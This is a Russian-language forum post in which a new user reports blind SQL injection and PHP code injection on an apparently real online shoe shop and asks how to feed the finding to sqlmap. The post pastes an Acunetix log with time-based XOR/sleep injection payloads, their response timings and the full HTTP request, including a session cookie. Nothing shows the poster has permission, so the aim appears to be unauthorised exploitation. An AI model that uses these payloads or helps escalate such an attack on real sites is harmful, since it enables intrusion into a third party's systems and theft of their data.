
22.09.2020, 18:16
|
|
Новичок
Регистрация: 22.09.2020
Сообщений: 9
Провел на форуме: 3379
Репутация:
0
|
|
Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку
.SpoilerTarget" type="button">Spoiler: Лог
The vulnerability affects https://www.site.com/ , ////[*]/.html
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
Path Fragment input ////[*]/.html was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496
- 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613
- 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737
Original value: Sneaker
HTTP Request
arrow_drop_up
GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
|
|
|